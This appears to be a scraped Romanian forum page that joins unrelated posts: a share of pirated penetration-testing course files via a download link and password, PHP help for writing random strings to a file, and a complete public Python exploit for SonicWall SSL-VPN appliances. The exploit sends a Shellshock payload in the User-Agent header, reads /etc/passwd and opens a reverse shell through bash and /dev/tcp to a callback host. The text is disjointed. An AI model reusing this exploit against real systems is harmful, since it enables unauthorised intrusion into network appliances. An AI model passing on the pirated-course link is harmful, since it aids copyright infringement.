Leaderboard

1- Web Application Penetration Testing eXtreme (eWPTX ) ---------------------------------------------------- 03. Website_cloning.mp4 03. From_An_XSS_To_A_SQL_Injection.mp4 03. Keylogging.mp4 09. Advanced XXE Exploitation.MP4 07. Advanced_SecondOrder_SQL_Injection_Exploitation.mp4 05. Advanced_XSRF_Exploitation_part_i.mp4 06. Advanced_XSRF_Exploitation_part_ii.mp4 09. Advanced_Xpath_Exploitation.mp4 WAPTx sec 9.pdf WAPTx sec 8.pdf WAPTx sec 2.pdf WAPTx sec 3.pdf WAPTx sec 5.pdf WAPTx sec 6.pdf WAPTx sec 4.pdf WAPTx sec 7.pdf WAPTx sec 1.pdf 2- Penetration Testing Professional (ePTPv3) 3- Web Application Penetration Testing (eWAPT v2) ---------------------------------------------------- Penetration Testing Process Introduction Information Gathering Cross Site Scripting SQL Injection Authentication and Authorization Session Security HTML5 File and Resources Attacks Other Attacks Web Services XPath https://mega.nz/#!484ByQRa!N7-wnQ3t5pMCavOvzh8-xMiMKSD2RARozRM99v17-8I Pass: P8@Hu%vbg_&{}/2)p+4T Sursa:

generateStrings() returneaza un sir, nu un string. Sirul respectiv trebuie parsat ca sa-l poti adauga corect in fisier: foreach(generateStrings($_POST['lungime'], $_POST['cate']) as $string) { file_put_contents("a.txt", $string . "\r\n", FILE_APPEND); } foreach ia fiecare element din sir si il trateaza separat ca variabila $string al doilea parametru din file_put_contents, $string . "\r\n", pune stringul in fisier si la sfarsit ii adauga delimitatorul pentru rand nou pentru Windows (pe Linux ar fi doar "\n") al treilea parametru din file_put_contents, FILE_APPEND, e un flag care sa zica sa adauge in continuarea fisierului si sa nu stearga continutul anterior Tot codul pentru referinta <form action="" method="post"> Cate coduri sa genereze: <input type="text" name="cate"><br /> Lungime coduri: <input type="text" name="lungime"><br /><br /> <input type="submit" value="Genereaza"> </form> <br /><br /> <?php function getRandom($lungime) { $a = str_split("1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"); $str = ""; for($i=0; $i<(int) $lungime; $i++) $str .= $a[rand(0,count($a)-1)]; return $str; } function generateStrings($lungime, $cate){ $str = []; for($i=0;$i<$cate;$i++) $str[] = getRandom($lungime, $cate); return $str; } if(isset($_POST)) foreach(generateStrings($_POST['lungime'], $_POST['cate']) as $string) file_put_contents("a.txt", $string . "\r\n", FILE_APPEND); ?>

Daca vrei sa ai un formular in care sa selectezi valorile + string-uri de orice lungime <form action="" method="post"> Cate coduri sa genereze: <input type="text" name="cate"><br /> Lungime coduri: <input type="text" name="lungime"><br /><br /> <input type="submit" value="Genereaza"> </form> <br /><br /> <?php function getRandom($lungime) { $a = str_split("1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"); $str = ""; for($i=0; $i< $lungime; $i++) $str .= $a[rand(0,count($a)-1)]; return $str; } function generateStrings($lungime, $cate){ $str = []; for($i=0;$i<$cate;$i++) $str[] = getRandom($lungime); return $str; } if(isset($_POST)) foreach(generateStrings($_POST['lungime'], $_POST['cate']) as $string) echo $string . "<br />"; ?> Ca sa le pui intr-un fisier, deschizi un file handler, apelezi generateStrings() care iti returneaza un array, treci prin fiecare element din array si le pui in fisier. Gasesti aici o explicatie destul de ok cu tot cu exemple.

SonicWall SSL-VPN Exploit, as used by Phineas Fisher to hack Cayman Trust Bank and Hacking Team. Unauthenticated, gives you a "nobody" shell. Getting root is an exercise for the user. For details see: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ #!/usr/bin/python # coding: utf-8 # Author: Darren Martyn # Credit: Phineas Fisher # Notes: # This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team # and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command # execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns # a trivial reverse shell using /dev/tcp. # There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but # implementing that is left as an exercise for the reader. I've seen a few approaches, and # would be interested in seeing yours. # There is another LPE that works only on some models which I also have removed from this. # Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ import requests import sys import telnetlib import socket from threading import Thread from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import time def banner(): print """ 88 88 "" 88 88 8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88 `8b d8' 88 I8[ "" 88 88 "" `Y8 88 `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88 `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88 "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88 88 88 88 ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba, a8" `Y88 a8" "8a a8" "8a 88P' "Y8 8b 88 8b d8 8b d8 88 "8a, ,d88 "8a, ,a8" "8a, ,a8" 88 `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88 SonicWall SSL-VPN Appliance Remote Exploit Public Release (Jan 2021). Author: Darren Martyn. Credit goes to Phineas Fisher for this. Stay inside, do crimes. """ def handler(lp): # handler borrowed from Stephen Seeley. print "(+) starting handler on port %d" %(lp) t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" %(addr[0]) t.sock = conn print "(+) pop thy shell!" t.interact() def execute_command(target, command): url = target + "/cgi-bin/jarrewrite.sh" headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)} r = requests.get(url=url, headers=headers, verify=False) return r.text def check_exploitable(target): print "(+) Testing %s for pwnability..." %(target) output = execute_command(target=target, command="cat /etc/passwd") if "root:" in output: print "(*) We can continue, time to wreck this shit." return True else: return False def pop_reverse_shell(target, cb_host, cb_port): print "(+) Sending callback to %s:%s" %(cb_host, cb_port) backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port) execute_command(target=target, command=backconnect) def hack_the_planet(target, cb_host, cb_port): if check_exploitable(target) == True: pass else: sys.exit("(-) Target not exploitable...") handlerthr = Thread(target=handler, args=(int(cb_port),)) handlerthr.start() pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port) def main(args): banner() if len(args) != 4: sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0])) hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3]) if __name__ == "__main__": main(args=sys.argv) Download VisualDoor-main.zip or git clone https://github.com/darrenmartyn/VisualDoor.git Source

<?php function getRandom() { $a = str_split("1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"); shuffle ($a); $r = implode($a); $f = substr($r,0,16); return $f; } for($i = 0; $i < 10; $i++) print getRandom() . "\r\n"; ?>

Poate se tine cont de nr fara prefix, habar n am

Deșteaptă-te romane